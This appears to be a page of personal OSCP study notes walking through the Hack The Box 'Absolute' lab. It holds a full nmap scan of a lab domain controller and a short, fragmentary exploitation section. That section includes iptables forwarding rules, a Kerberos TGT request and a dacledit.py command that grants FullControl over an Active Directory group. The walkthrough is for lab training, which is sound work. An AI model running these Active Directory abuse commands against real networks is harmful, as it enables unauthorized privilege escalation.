Total OSCP Guide Payloads All The Things

Absolute HTB

Using autorecon to enumerate:

# Nmap 7.94SVN scan initiated Tue Feb 20 17:52:22 2024 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/Downloads/absolute/results/10.10.11.181/scans/_full_tcp_nmap.txt -oX /home/kali/Downloads/absolute/results/10.10.11.181/scans/xml/_full_tcp_nmap.xml 10.10.11.181
Increasing send delay for 10.10.11.181 from 0 to 5 due to 91 out of 227 dropped probes since last increase.
Warning: 10.10.11.181 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.181
Host is up, received user-set (0.046s latency).
Scanned at 2024-02-20 17:52:22 IST for 625s
Not shown: 65500 closed tcp ports (reset)
PORT      STATE    SERVICE       REASON                              VERSION
80/tcp    open     http          syn-ack ttl 127                     Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Absolute
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open     kerberos-sec  syn-ack ttl 127                     Microsoft Windows Kerberos (server time: 2024-02-20 19:31:13Z)
135/tcp   open     msrpc         syn-ack ttl 127                     Microsoft Windows RPC
389/tcp   open     ldap          syn-ack ttl 127                     Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA/domainComponent=absolute
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-07-17T21:11:52
| Not valid after:  2024-07-16T21:11:52
| MD5:   8355:ce67:4d7e:e8ab:e5d1:ec4c:8482:550b
| SHA-1: c9cb:a13e:be47:d989:40d5:92e2:b9ef:cfff:9ef4:53e5
|_ssl-date: 2024-02-20T19:32:46+00:00; +7h00m00s from scanner time.
445/tcp   open     microsoft-ds? syn-ack ttl 127
464/tcp   open     kpasswd5?     syn-ack ttl 127
593/tcp   open     ncacn_http    syn-ack ttl 127                     Microsoft Windows RPC over HTTP 1.0
636/tcp   open     ssl/ldap      syn-ack ttl 127                     Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA/domainComponent=absolute
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-07-17T21:11:52
| Not valid after:  2024-07-16T21:11:52
| MD5:   8355:ce67:4d7e:e8ab:e5d1:ec4c:8482:550b
| SHA-1: 
|_ssl-date: 2024-02-20T19:32:47+00:00; +7h00m00s from scanner time.
689/tcp   filtered nmap          no-response
3269/tcp  open     ssl/ldap      syn-ack ttl 127                     Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-02-20T19:32:46+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA/domainComponent=absolute
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-07-17T21:11:52
| Not valid after:  2024-07-16T21:11:52
| MD5:   8355:ce67:4d7e:e8ab:e5d1:ec4c:8482:550b
| SHA-1: c9cb:a13e:be47:d989:40d5:92e2:b9ef:cfff:9ef4:53e5

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 64848/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 16687/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 58099/udp): CLEAN (Failed to receive data)
|   Check 4 (port 41463/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time: 
|   date: 2024-02-20T19:32:40
|_  start_date: N/A

TRACEROUTE (using port 7847/tcp)
HOP RTT      ADDRESS
1   43.93 ms 10.10.14.1
2   44.01 ms 10.10.11.181

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 20 18:02:47 2024 -- 1 IP address (1 host up) scanned in 625.40 seconds

Exploitation

ASREPRoast

We find test.exe in the smb Now trying it in windows vm we need to port forward with

sudo iptables -A FORWARD -i tun0 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
                                                    sudo iptables -A FORWARD -i eth0 -o tun0  -j ACCEPT                                    
sudo iptables -t nat -A POSTROUTING -s 192.168.161.0/24 -o tun0 -j MASQUERADE

Now get the TGT for m.lovegod

getTGT.py absolute.htb/m.lovegod

Then

KRB5CCNAME=/home/kali/Downloads/absolute/m.lovegod.ccache ./dacledit.py -k -no-pass -dc-ip 10.10.11.181 -principal m.lovegod -target "Network Audit" -action write -rights FullControl absolute.htb/m.lovegod

NOTE: BEFORE USING RUNAS CHECK THAT THE WHOLE COMMAND IS IN '' AND THE ARGUMENT INSIDE IS IN "". TRY USING TRUSTEDINSTALLER CLSID IF ERROR.

PreviousHack The BoxNextActive HTB

Last updated